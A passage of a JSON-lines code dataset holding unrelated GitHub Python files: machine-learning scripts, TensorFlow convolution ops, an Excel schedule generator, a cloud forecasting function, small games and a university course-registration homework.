42)\r\n\r\n\r\n# Model Training\r\nmodels = [RandomForestRegressor(n_estimators=100, max_features= 100), BaggingRegressor(), HistGradientBoostingRegressor()]\r\n\r\nfor m in models:\r\n m.fit(X_train, Y_train)\r\n\r\n pred_train = m.predict(X_train)\r\n print(m, (('<>' * 25) * 3),f'\\nTrain Accuracy is : {evs(Y_train, pred_train)}')\r\n\r\n pred_test = m.predict(X_test)\r\n print(f'\\nTest Accuracy is : {evs(Y_test, pred_test)}')\r\n","repo_name":"kynivv/Smartphone_Price_Predictor_ML","sub_path":"Smartphone_Price_Predictor_ML/Model_Training.py","file_name":"Model_Training.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18073906245","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 12 12:03:04 2023\r\n\r\n@author: saksh\r\n\"\"\"\r\n\r\nimport pandas as pd\r\n\r\ndata=pd.read_csv(\"10iris.csv\")\r\nX=data.iloc[:,:-1].values\r\ny=data.iloc[:,-1].values\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25,random_state=0)\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc=StandardScaler()\r\nX_train=sc.fit_transform(X_train)\r\nX_test=sc.transform(X_test)\r\n\r\nfrom sklearn.svm import SVC\r\nclf=SVC(kernel=\"linear\",random_state=0,)\r\n\r\nclf.fit(X_train,y_train)\r\npred=clf.predict(X_test)\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import accuracy_score,confusion_matrix\r\nprint(metrics.accuracy_score(y_test, pred))\r\nprint(metrics.confusion_matrix(y_test, pred))\r\nprint(metrics.recall_score(y_test, pred,average=\"weighted\"))\r\nprint(metrics.precision_score(y_test, pred,average=\"weighted\"))\r\n\r\n","repo_name":"sakz02/ml-6thsem","sub_path":"10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18319446749","text":"######## ops\nimport math\nimport tensorflow as tf\ndef conv(name,x,ker_size,outs,s,cur_bin_m,mask_convd,new_bin_m,if_bn=True):\n ker = int(math.sqrt(ker_size))\n x_shape = [i.value for i in x.get_shape()]\n with tf.variable_scope(name):\n w = tf.get_variable('w',\n [ker,ker,x_shape[-1],outs],\n tf.float32,\n tf.initializers.truncated_normal(stddev=0.02))\n b = tf.get_variable('b',\n [outs],\n tf.float32,\n tf.initializers.constant(0.))\n return (tf.nn.conv2d(x*cur_bin_m,w,[1,s,s,1],\"SAME\")*mask_convd+b)*new_bin_m\n \ndef ins_norm(name,x,new_bin_m):\n with tf.variable_scope(name):\n x_ins = tf.contrib.layers.instance_norm(x)\n return x_ins*new_bin_m\n \ndef relu(name,x):\n with tf.variable_scope(name):\n return tf.nn.relu(x)\n \ndef tanh(name,x):\n with tf.variable_scope(name):\n return tf.nn.tanh(x)\n\ndef conv_up(name, in1, in1_mask, in2, in2_mask, maskconvd, masknewbin, ker_size, outs, s):\n ker = int(math.sqrt(ker_size))\n in_ch = [i.value for i in in1.get_shape()][-1] + [i.value for i in in2.get_shape()][-1]\n hi = [i.value for i in in1.get_shape()][1]\n with tf.variable_scope(name):\n in_up = tf.image.resize_images(in1,\n [int(2*hi),int(2*hi)], \n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n w = tf.get_variable('w',\n [ker,ker,in_ch,outs],\n tf.float32,\n tf.initializers.truncated_normal(stddev=0.02))\n b = tf.get_variable('b',\n [outs],\n tf.float32,tf.initializers.constant(0.))\n \n return 
(tf.nn.conv2d(tf.concat([in_up*in1_mask,in2*in2_mask],3),w,[1,s,s,1],\"SAME\")*maskconvd+b)*masknewbin\n","repo_name":"Rongpeng-Lin/PConv_in_tf","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"23749227975","text":"import pandas as pd\nfrom datetime import datetime\n\nfrom vikur import Vikur\n\ndef highlight_cells(M, x):\n\n # Litir í stundatöflu\n colors = ['#CC99FF','#660066','#33CCCC','#FFFFCC','#99CCFF','#FF6600',\n '#003366','#99CC00','#003300','#808080','#FFCC99','#FFFF99',\n '#0000FF','#0066CC','#9999FF','#969696','#CCFFFF','#00CCFF',\n '#FFFF00','#00FF00','#00FFFF','#C0C0C0','#008080','#808000',\n '#666699','#800080','#993366','#800000','#333333','#FF9900',\n '#CCFFCC','#FF0000','#000080','#333300','#FF99CC','#FFCC00',\n '#339966','#FF00FF','#CCCCFF','#3366FF','#993300','#FF8080',\n '#333399','#008000']\n\n color_table = dict()\n for i, namskeid in enumerate(sorted(list(set(M.klinik).union(M.val_listi)))):\n color_table.update({ namskeid: colors[i % len(colors)] })\n\n df = x.copy()\n df.loc[:,:] = ''\n for nemandi in x.index:\n for v in x.columns:\n t = x.loc[nemandi, v]\n if isinstance(t, str):\n if t in color_table:\n if t in M.klinik_vikur:\n for w in M.klinik_vikur[t][v]:\n df.loc[nemandi,w] = f'background-color: {color_table[t]}'\n else:\n for w in M.val_vikur[t]:\n df.loc[nemandi,w] = f'background-color: {color_table[t]}'\n return df\n\n# Ár frá viku\ndef arv(a, v, mid):\n if v < mid:\n return a+1\n return a\n\n# Dagsetning frá ári og viku, mánudagur\ndef dags_upphaf(a, v, mid):\n return datetime.strptime(f'{arv(a, v, mid)}-{v}-1', '%Y-%W-%w').strftime('%d/%m/%Y')\n\n# Dagsetning frá ári og viku, sunnudagur\ndef dags_lok(a, v, mid):\n return datetime.strptime(f'{arv(a, v, mid)}-{v}-0', '%Y-%W-%w').strftime('%d/%m/%Y')\n\ndef generate_excel(M, x, year, out_dir):\n V = Vikur()\n\n # MRS-leg skjöl\n\n mid = 25\n\n for c in M.klinik:\n df = pd.DataFrame(columns=['Fullt nafn nema', 'Kennitala', 'Kyn', 'Netfang',\n 'Farsími', 'Þjóðerni (ISO kóði)', 'Starfsheiti (kóði)',\n 'Kennitala leiðbeinanda', 'Deild (viðfang)', 'Frá',\n 'Til', 'Dagar/viku', 'Athugasemd',\n 'Námstig (GYMNASIUM, GRADUATE, POSTGRADUATE',\n 'Skóli (kóði/nafn)',\n 'Námsgráða (ef postgrad) (ss. 
CP, Diploma, MD, MPH, EDS',\n 'Aðalnámsgrein (kóði/nafn)', 'Sérnámsgrein (kóði/nafn)',\n 'Land erlends skóla (ISO kóði)', 'Samtök (kóði/nafn)',\n 'Áætluð útskrift', 'Nemandi hefur undirritað þagnarheiti',\n 'Nemandi hefur undirritað reglur um notkun sjúkraskrárupplýsinga',\n 'Auðkenniskort hefur verið afgreitt',\n 'Nemandi þarf tölvuaðgang',\n 'Nemandi hefur farið í heilbrigðisviðtal',\n 'Nemandi þarf mynd í auðkenniskort',\n 'Nemandi þarf auðkenniskort',\n 'Nemandi sækir auðkenniskort til skrifstofu',\n 'Nemandi sækir auðkenniskort til umsjónarmanns',\n 'Ónotað', 'Deild', 'Deildarstjóri',\n 'Netfang (deild)', 'Símanúmer'])\n i = 1\n for w in sorted(V.raun.keys()):\n v = V.raun[w]\n if v in M.klinik[c] and len(M.klinik[c][v]) > 0:\n df.loc[i] = { 'Fullt nafn nema': f'Vika {v}' }\n i += 1\n for d in M.klinik[c][v]:\n skradir = 0\n for s in M.nemendur:\n if x[s,c,v,d].X > 0:\n upphafsvika = min(M.klinik_vikur[c][v])\n lokavika = max(M.klinik_vikur[c][v])\n skradir += 1\n df.loc[i] = { 'Fullt nafn nema': M.nemendur[s].nafn.title(),\n 'Kennitala': M.nemendur[s].kennitala,\n 'Netfang': M.nemendur[s].netfang,\n 'Farsími': M.nemendur[s].farsimi,\n 'Deild (viðfang)': M.klinik[c][v][d].vidfang,\n 'Frá': dags_upphaf(year, upphafsvika, mid),\n 'Til': dags_lok(year, lokavika, mid),\n 'Deild': M.klinik[c][v][d].heiti,\n 'Deildarstjóri': M.klinik[c][v][d].stjori.title(),\n 'Netfang (deild)': M.klinik[c][v][d].netfang,\n 'Símanúmer': M.klinik[c][v][d].simanumer }\n i += 1\n while skradir < M.klinik[c][v][d].plass:\n skradir += 1\n df.loc[i] = { 'Fullt nafn nema': '',\n 'Kennitala': '',\n 'Netfang': '',\n 'Farsími': '',\n 'Deild (viðfang)': M.klinik[c][v][d].vidfang,\n 'Frá': dags_upphaf(year, upphafsvika, mid),\n 'Til': dags_lok(year, lokavika, mid),\n 'Deild': M.klinik[c][v][d].heiti,\n 'Deildarstjóri': M.klinik[c][v][d].stjori.title(),\n 'Netfang (deild)': M.klinik[c][v][d].netfang,\n 'Símanúmer': M.klinik[c][v][d].simanumer }\n i += 1\n df.to_excel(f'{out_dir}/mrs_radad_{c}.xlsx')\n\n # Allar skráningar\n # Reikna síðustu viku í klíník fyrir hvern nemanda\n sidasta_vika = dict()\n sidasta_vika_serstakt = { s: dict() for s in M.nemendur }\n\n # Normaliserar vikur; raðar þeim frá 0 eftir röð innan skólaárs\n allar_vikur = M.vikur.copy()\n for c in M.klinik_vikur:\n for w in M.klinik_vikur[c]:\n allar_vikur = allar_vikur | M.klinik_vikur[c][w]\n for c in M.val_vikur:\n allar_vikur = allar_vikur | set(M.val_vikur[c])\n\n vikur_fyrir = { v for v in allar_vikur if v > mid }\n vikur_eftir = { v for v in allar_vikur if v < mid }\n vikur_radadar = [v for v in vikur_fyrir] + [v for v in vikur_eftir]\n\n nemindex = ['Dagsetning'] + list(M.nemendur.keys())\n nemcols = ['Nafn'] + vikur_radadar\n\n stundatafla = pd.DataFrame('', index=nemindex, columns=nemcols)\n\n for col in stundatafla.columns:\n if col == 'Nafn':\n stundatafla[col] = [''] + [M.nemendur[s].nafn for s in stundatafla.index if s != 'Dagsetning']\n else:\n stundatafla[col]['Dagsetning'] = dags_upphaf(year, col, mid)\n\n # Valnámskeið\n for s in M.nemendur:\n for c in M.val_nemenda[s]:\n if M.val_nemenda[s][c] > 0:\n for v in M.val_vikur[c]:\n stundatafla.loc[s,v] = f'{c}'\n\n # Klínísk námskeið\n for s in M.nemendur:\n for c in M.klinik:\n for v in M.klinik[c]:\n if v > 0:\n for d in M.klinik[c][v]:\n if x[s,c,v,d].X > 0:\n # Þurfum víst ekki deild\n # stundatafla.loc[s,v] = f'{c} ({d})'\n stundatafla.loc[s,v] = f'{c}'\n if s not in sidasta_vika:\n sidasta_vika[s] = v\n else:\n if V.sym[v] > V.sym[sidasta_vika[s]]:\n sidasta_vika[s] = v\n 
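# also record, per course, the most recent week assigned to this student\n                            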
sidasta_vika_serstakt[s][c] = v\n\n    for s in M.nemendur:\n        if s not in sidasta_vika:\n            sidasta_vika[s] = 0\n\n    stundatafla_lit = stundatafla.style.apply(lambda x: highlight_cells(M, x), axis=None)\n    stundatafla_lit.to_excel(f'{out_dir}/stundatafla.xlsx')\n\n    # Skráningar\n    skraningar = pd.DataFrame(index=M.klinik, columns=vikur_radadar)\n\n    for s in M.nemendur:\n        for c in M.klinik:\n            for v in M.klinik[c]:\n                if v >= 0:\n                    for d in M.klinik[c][v]:\n                        if x[s,c,v,d].X > 0:\n                            if pd.isna(skraningar.loc[c,v]):\n                                skraningar.loc[c,v] = 1\n                            else:\n                                skraningar.loc[c,v] += 1\n\n    for v in skraningar.columns:\n        for c in skraningar.index:\n            if v >= 0 and not pd.isna(skraningar.loc[c,v]):\n                skraningar.loc[c,v] = f'{skraningar.loc[c,v]} / {sum(M.klinik[c][v][d].plass for d in M.klinik[c][v])}'\n\n    skraningar.to_excel(f'{out_dir}/skraningar.xlsx')","repo_name":"Tomasingi/HVS_dist","sub_path":"lib/excel_generator.py","file_name":"excel_generator.py","file_ext":"py","file_size_in_byte":8055,"program_lang":"python","lang":"is","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16873033756","text":"\"\"\"\nGoogle Cloud Function\n\nTriggered by a Google Cloud cron job daily at 01:10.\n\nAccesses the raw predictions in GCS and calculates the persistance forecast for the next day's benchmark predictions.\n\nTypes of persistance forecasts available:\n\n1. Persistance: Previous day's demand used as today's forecast.\n2. 
Persistance 3 Day Moving Average: Applies a moving average to the last 3 days.\n3. Persistance Hourly-by-hour 3 day moving average: Applies a moving average for each hour of the day for the last 3 days.\n\n\"\"\"\n\n\ndef gen_persistance_forecasts(request):\n from datetime import datetime, timedelta\n import pandas as pd\n import numpy as np\n from google.cloud import storage\n \n FOLDER_DOWN = 'raw-days'\n FOLDER_UP = 'persistance_forecasts'\n BUCKET = 'ml-energy-dashboard-raw-data'\n \n def get_time_dates(period):\n end = datetime.today()\n start = datetime.today() + timedelta(-period)\n delta = end-start\n\n time_pairs = list()\n\n for i in range(delta.days+1):\n begin_time = (start + timedelta(i-1)).strftime('%Y%m%d')\n begin_time = f'{begin_time}T2300'\n end_time = (start + timedelta(i)).strftime('%Y%m%d')\n end_time = f'{end_time}T2300'\n\n time_pairs.append((begin_time, end_time))\n \n return time_pairs \n \n def raw_data_date():\n return (datetime.today()+timedelta(-1)).strftime('%Y%m%d')\n \n def gcs_save_name(date):\n return f'es-persistance-forecasts-{date}'\n \n def gcs_load_name(start, end):\n return f'es-energy-demand-{start}-{end}'\n\n def get_gcs_data(client, bucket_name, folder_name, file_name):\n \n bucket = client.get_bucket(bucket_name)\n blob = bucket.blob(f'{folder_name}/{file_name}')\n data_json = blob.download_as_string()\n \n return pd.read_json(data_json, typ='series', orient='records', keep_default_dates=False)\n \n def upload_data_to_gcs(client, data, bucket_name, folder_name, file_name):\n \n bucket = client.get_bucket(bucket_name)\n blob = bucket.blob(f'{folder_name}/{file_name}')\n blob.upload_from_string(data.to_json())\n \n def reset_data_index(data_list):\n\n data = pd.concat(data_list, axis=0)\n data.index = data.index.tz_localize('UTC').tz_convert('Europe/Madrid')\n\n return data\n\n\n def persistance(series, date):\n return series[date]\n\n def persistance_day_ma(series, num_days, date):\n \n window=24*num_days\n rolling_mean = series.rolling(window=window, min_periods=24, closed='right').mean()\n \n return rolling_mean[date]\n\n def persistance_MA_hourly(series, days):\n \n df = series.groupby(series.index.hour).mean()\n \n return df\n\n def calc_persistance_forecasts(data):\n date = (datetime.today()+timedelta(-1)).strftime('%Y%m%d')\n \n p1 = persistance(data, date)\n p2 = persistance_day_ma(data, 3, date)\n p3 = persistance_MA_hourly(data, 3)\n \n data = np.vstack([p1.values, p2.values, p3.values]).T\n persist_df = pd.DataFrame(data, columns=['naive', 'MA3-day', 'MA30day-hbh'])\n\n today = datetime.today().strftime('%Y%m%d')\n persist_df.index = pd.DatetimeIndex(pd.date_range(start=f'{today}T0000', end=f'{today}T2300', freq='H'))\n \n return persist_df\n\n params = request.get_json()\n \n if 'gen_persist' in params and params['gen_persist']:\n storage_client = storage.Client()\n\n # creds = service_account.Credentials.from_service_account_file(os.environ['GOOGLE_APPLICATION_CREDENTIALS'])\n # storage_client = storage.Client(credentials=creds, project=project_id)\n #download the data to make the persistance forecast\n time_pairs = get_time_dates(3)\n print(time_pairs)\n data_list = list()\n\n for time_pair in time_pairs:\n\n file_name = f'es-energy-demand-{time_pair[0]}-{time_pair[1]}'\n data = get_gcs_data(storage_client, BUCKET, FOLDER_DOWN, file_name)\n data_list.append(data)\n \n data = reset_data_index(data_list)\n\n #calcuate the persistance forecasts\n persistance_forecasts = calc_persistance_forecasts(data)\n\n #upload to gcs\n 
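# the object name embeds today's date, so each daily run writes a new forecast file\n        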
persistance_file_name = gcs_save_name(datetime.today().strftime('%Y%m%d'))\n        # create persistence forecasts: today's values become tomorrow's baseline forecast\n        upload_data_to_gcs(storage_client, persistance_forecasts, BUCKET, FOLDER_UP, persistance_file_name)\n","repo_name":"kolasniwash/electrical-forecast-prediction-service","sub_path":"cloud_functions/gen_persistance_forecasts.py","file_name":"gen_persistance_forecasts.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"21494370449","text":"# Task 08\r\n# Созданы переменные d и e. Создайте переменную f куда поместите результат деления d на e. Выведите в консоль переменную f.\r\n\r\nd = 1024\r\ne = 128\r\n\r\n# write your code under this line\r\n\r\nf = d / e\r\nprint(f)","repo_name":"GrytsenkoAndrey/itgid-python","sub_path":"sprint_02/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25027007601","text":"import time\r\nimport numpy as np\r\n\r\nprint(\"\"\"Let's start the game!\"\"\")\r\n\r\n# Inputs\r\nFinish = True\r\npuntos_totales = 0\r\nmaximo = int(input('Maximum number of the range='))\r\nminimo = int(input('Minimum number of the range='))\r\n\r\n# Game loop\r\nwhile Finish:\r\n    \r\n    num1 = np.random.randint(minimo,maximo)\r\n    num2 = np.random.randint(minimo,maximo)\r\n    correct = num1 * num2\r\n    seconds = time.time()\r\n    \r\n    print(\"{} x {} = \".format(num1,num2))\r\n    number = input(\"\")\r\n    \r\n    if number == 'Finish':\r\n        Finish = False\r\n    else:\r\n        number = int(number)\r\n\r\n    puntos = len(str(correct))\r\n\r\n    if number == correct and Finish:\r\n        print(\"Correct\")\r\n        if time.time()-seconds < 5:\r\n            puntos_totales = puntos_totales + puntos\r\n            print(\"Points = {} \\nTotal points = {}\".format(puntos,puntos_totales))\r\n    elif Finish:\r\n        print(\"Incorrect\")\r\n        print(\"The correct number is = {}\".format(correct))\r\n\r\n    if time.time()-seconds > 5:\r\n        print('Time out')\r\n","repo_name":"RubenPhy/Little_things","sub_path":"Multiplication_Game-master/Amateur_version.py","file_name":"Amateur_version.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71477976741","text":"# In this file, we define download_model\n# It runs during container build time to get model weights built into the container\n\n# In this example: A Huggingface GPTJ model\n\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\n\ndef download_model():\n    # do a dry run of loading the huggingface model, which will download weights\n    print(\"downloading tokenizer...\")\n    tokenizer = AutoTokenizer.from_pretrained(\"togethercomputer/GPT-JT-6B-v1\")\n    print(\"done\")\n\n    print(\"downloading model...\")\n    model = AutoModelForCausalLM.from_pretrained(\"togethercomputer/GPT-JT-6B-v1\")\n    print(\"done\")\n\nif __name__ == \"__main__\":\n    download_model()","repo_name":"lucataco/serverless-template-gpt-jt","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"73662106341","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\n\ndef mse(poly, graph):\n    
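# mean squared error between the polynomial fit and the measured data\n    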
z=sum((poly-graph)**2)/len(poly)\n return z\n\ndef mae(poly, graph):\n z=sum(abs(poly-graph))/len(poly)\n return z\n\n\ndef read_file(file):\n lst = []\n\n for line in file:\n lst += [line.split()]\n x = [float(x[0]) for x in lst]\n y = [float(x[1]) for x in lst]\n return x, y\n\n \ndef plot_fit(x, y, label, file):\n\n plt.plot(x, y, label='by '+label)\n plt.grid(True, which=\"both\", ls=\"-\", color='0.9')\n plt.xlabel(r'$n_{rows}=n_{cols}$')\n plt.ylabel('CPUTIME [s]')\n\n\n\n z3,resz3, _, _, _ = np.polyfit(x, y, deg=3, full=True)\n p3 = np.poly1d(z3)\n\n z2,resz2, _, _, _ = np.polyfit(x, y, deg=2, full=True)\n p2 = np.poly1d(z2)\n\n z4,resz4, _, _, _ = np.polyfit(x, y, deg=4, full=True)\n p4 = np.poly1d(z4)\n\n \n z_list = [z2, z3, z4]\n mse_2 = mean_squared_error(p2(x), y)\n mse_3 = mean_squared_error(p3(x), y)\n mse_4 = mean_squared_error(p4(x), y)\n mae_2 = mean_absolute_error(p2(x), y)\n mae_3 = mean_absolute_error(p3(x), y)\n mae_4 = mean_absolute_error(p4(x), y)\n \n for z in z_list:\n \n file.write(str(z)+'\\n')\n file.close()\n \n\n xp = np.linspace(0, 2000, 200)\n plt.plot(xp, p2(xp), '-', label=f'n=2, MSE={mse_2:.5f}')\n plt.plot(xp, p3(xp), '-', label=f'n=3, MSE={mse_3:.5f}')\n plt.plot(xp, p4(xp), '-', label=f'n=4, MSE={mse_4:.5f}')\n plt.legend()\n plt.title(f'polynomial fit (deg=n) for Matrix size vs CPUTIME,\\n by {label} multiplication')\n plt.savefig(f'outfile/polyfitby{label}.png', dpi=300)\n plt.show()\n \n\n\n\n\n\n\nfile = open('outfile/matmul_col.dat')\nx, ycol = read_file(file)\nfile = open('outfile/matmul_row.dat')\nx, yrow = read_file(file)\nfile = open('outfile/matmul_routine.dat')\nx, yF = read_file(file)\n\n\nplt.plot(x, yrow, label='by rows')\nplt.plot(x, ycol, label='by cols')\nplt.plot(x, yF, label='Fortran subroutine')\nplt.yscale('log', nonpositive='clip')\nplt.legend()\nplt.grid(True, which=\"both\", ls=\"-\", color='0.9')\nplt.xlabel(r'$n_{rows}=n_{cols}$')\nplt.ylabel('CPUTIME [s]')\n#plt.tight_layout()\nplt.savefig(f'outfile/CPUTIME.png', dpi=300)\nplt.show()\n\n\n\nplot_fit(x, ycol, 'cols', open('outfile/zcols.dat', 'w'))\nplot_fit(x, yrow, 'rows', open('outfile/zrows.dat', 'w'))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"giuliacampesan/UniversityAssignments","sub_path":"QuantumInfo/ex3/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"18170832409","text":"from collections import defaultdict, deque\nfrom vector import Vec2D\nfrom static_objects import Bullet\nfrom settings import TILE_SIZE, ENEMIES, SIZE_X, SIZE_Y\n\n\nclass Enemy():\n coords = []\n direction = Vec2D(0, 0)\n angle = 0\n turn = 0\n alive = True\n health = 100\n target = None\n bullet = None\n\n def __init__(self, coords):\n self.coords = coords\n\n def create_bullet(self):\n start = self.coords[2] + self.direction\n self.bullet = Bullet(start, self.direction, self.angle, \"enemy\")\n\n def check_health(self):\n self.health -= 30\n if self.health <= 0:\n self.alive = False\n\n def move(self, world):\n for i, position in enumerate(self.coords):\n ind1, ind2 = self.coords[i]\n move = position + self.direction\n world[move[0]][move[1]].energy += world[ind1][ind2].energy\n self.coords[i] = move\n if self.direction[0] == 0 and self.direction[1] < 0:\n self.angle = -180\n elif self.direction[0] == 0 and self.direction[1] > 0:\n self.angle = 0\n elif self.direction[1] == 0 and self.direction[0] < 0:\n self.angle = -90\n elif self.direction[1] == 0 and 
self.direction[0] > 0:\n self.angle = 90\n\n def valid_moves(self, cell):\n directions = [Vec2D(4, 0), Vec2D(0, -4), Vec2D(-4, 0), Vec2D(0, 4)]\n cells = [(direction + cell, direction) for direction in directions]\n check = lambda c: c[0][0] >= 0 and c[0][0] < SIZE_X and \\\n c[0][1] >= 0 and c[0][1] < SIZE_Y\n return filter(check, cells)\n\n def check_by_cell(self, direction, world):\n return all(map(lambda tile:\n self.check_direction(tile, direction, world),\n self.coords))\n\n def find_neighbours(self, cell, index, world, player):\n valid = self.valid_moves(cell)\n neigh_dict = defaultdict(list)\n for next, direction in valid:\n if self.check_by_cell(direction // 4, world):\n key = world[next[0]][next[1]].energy\n neigh_dict[key].append(direction // 4)\n self.direction = self.find_next(neigh_dict, index, world, player)\n\n def check_direction(self, cell, direction, world):\n p = cell + direction\n return \\\n p[0] >= 0 and p[0] < SIZE_X and \\\n p[1] >= 0 and p[1] < SIZE_Y and \\\n world[p[0]][p[1]].empty()\n\n def check_for_player(self, cell, direction, world):\n p = cell + direction\n return \\\n p[0] >= 0 and p[0] < SIZE_X and \\\n p[1] >= 0 and p[1] < SIZE_Y and \\\n (world[p[0]][p[1]].empty() or \\\n world[p[0]][p[1]].content == 'G' or \\\n world[p[0]][p[1]].content == 'Y')\n\n def detect_collision(self, direction, world):\n cells = [cell + direction for cell in self.coords\n if self.check_for_player(cell, direction, world)]\n return any([world[x][y].content == 'Y' or\n world[x][y].content == 'G' for x, y in cells])\n\n def find_next(self, neighbour_dirs, index, world, player):\n if player.distance(self.coords[0]) <= 10:\n self.create_bullet()\n keys = neighbour_dirs.keys()\n next_dir = None\n if keys:\n max_energy = max(keys)\n valid_dirs = neighbour_dirs[max_energy]\n for direction in valid_dirs:\n if self.detect_collision(direction, world):\n self.create_bullet()\n for direction in valid_dirs:\n if self.direction.same_direction(direction):\n return direction\n for direction in valid_dirs:\n if self.direction.same_direction(-direction):\n return direction\n if index < len(valid_dirs):\n self.create_bullet()\n return valid_dirs[index]\n elif valid_dirs:\n return valid_dirs[len(valid_dirs)-self.turn-1]\n else:\n self.create_bullet()\n return self.direction.rotate()\n","repo_name":"filareta/battle_city_game","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36402821198","text":"# HW2\n#Hersh Budhwar\n#Due Date: 09/25/2020, 11:59PM\n\"\"\" \n### Collaboration Statement:\n \n\"\"\"\nimport random\n\n\nclass Course:\n def __init__(self, cid, cname, credits):\n self.cid = cid #Course id\n self.cname = cname #Course name\n self.creds = credits #Credits\n\n\n def __str__(self):\n return(str(self.cid) + \"(\" + str(self.creds) + \"): \" + str(self.cname)) #CourseID(Credits): Course Name\n\n __repr__ = __str__\n\n def __eq__(self, other): # ==\n if isinstance(other, Course):\n if self.cid == other.cid:\n return True\n return False\n\n\nclass Catalog:\n def __init__(self):\n self.courses = {} #Dictionary containing all the courses offered\n\n\n @property\n def courseOfferings(self):\n return(self.courses)\n\n def addCourse(self, cid, cname, credits):\n if cid in self.courses: #Check if already in\n return(\"Course already added\")\n self.courses[cid] = (Course(cid, cname, credits)) #Not already in, so put it in\n return(\"Course added 
successfully\")\n\n\n def removeCourse(self, cid):\n if cid in self.courses: #Check if in catalog\n self.courses.pop(cid) #Remove\n return(\"Course removed successfully\")\n return(\"Course not found\")\n\n\nclass Semester:\n def __init__(self, sem_num):\n self.semnum = sem_num #Semester num\n self.courses = [] #List of courses in semester\n\n\n def __str__(self):\n if len(self.courses) == 0: #Return no courses if none in list\n return(\"No courses\")\n return(str(self.courses)[1:-1]) #Gets rid of brackets\n\n\n __repr__ = __str__\n\n\n def addCourse(self, course):\n if isinstance(course, Course) and isinstance(course.creds, int): #Makes sure course is a valid course\n if course in self.courses:\n return(\"Course already added\")\n self.courses.append(course) #Appends course if it passes all checks\n return\n else:\n return(\"Invalid course\")\n\n\n def dropCourse(self, course):\n if isinstance(course, Course): #converts course to just the ID to work with both scenarios\n course = course.cid\n\n if isinstance(course, str):\n for i in range(len(self.courses)): #Loops through list to find matches\n if self.courses[i].cid == course:\n self.courses.pop(i) #Removes\n return\n return(\"No such course\")\n return (\"Invalid course\")\n\n\n @property\n def totalCredits(self):\n total = 0 #\n for i in self.courses:\n total += i.creds\n return(total)\n\n\n @property\n def isFullTime(self):\n if self.totalCredits >= 12: #If greater than or equal to 12 credits\n return True\n return False\n\n \nclass Loan:\n def __init__(self, amount):\n self.amount = amount #\n self.loan_id = self.__loanID #Get random id\n\n\n def __str__(self):\n return(f\"Balance: ${self.amount}\") #Balance: #Amount\n\n __repr__ = __str__\n\n\n @property\n def __loanID(self):\n self.loan_id = random.randrange(10000,100000)\n return self.loan_id\n\n\nclass Person:\n '''\n >>> p1 = Person('Jason Lee', '204-99-2890')\n >>> p2 = Person('Karen Lee', '247-01-2670')\n >>> p1\n Person(Jason Lee, ***-**-2890)\n >>> p2\n Person(Karen Lee, ***-**-2670)\n >>> p3 = Person('Karen Smith', '247-01-2670')\n >>> p3\n Person(Karen Smith, ***-**-2670)\n >>> p2 == p3\n True\n >>> p1 == p2\n False\n '''\n\n def __init__(self, name, ssn):\n self.name = name\n self.ssn = ssn\n\n\n def __str__(self):\n return(f\"Person({self.name}, ***-**-{self.ssn[-4:]})\") #Person(Name, ***-**-Last 4 of SSN)\n\n\n __repr__ = __str__\n\n\n def get_ssn(self):\n return(self.ssn) #Returns full SSN\n\n\n def __eq__(self, other):\n if isinstance(other, Person):\n if self.ssn == other.ssn: #Checks equality based on SSN\n return True\n return False\n\n\nclass Staff(Person):\n def __init__(self, name, ssn, supervisor=None):\n super().__init__(name,ssn) #Gets values from person class\n self.supervisor = supervisor\n\n\n def __str__(self):\n return(f\"Staff({self.name}, {self.id})\") #Staff(Name, ID)\n\n __repr__ = __str__\n\n\n @property\n def id(self):\n output = \"905\"\n initials_list = self.name.split(\" \")\n for i in initials_list:\n output += str(i[0:1].lower())\n output += self.ssn[-4:]\n return(output)\n\n\n @property \n def getSupervisor(self):\n return self.supervisor\n\n\n def setSupervisor(self, new_supervisor):\n if isinstance(new_supervisor, Staff): #Checks validity\n self.supervisor = new_supervisor #Set\n return(\"Completed!\")\n return()\n\n\n def applyHold(self, student):\n if isinstance(student, Student): #Check validity\n student.hold = True\n return(\"Completed!\")\n return\n\n\n def removeHold(self, student):\n if isinstance(student, Student): #Check\n 
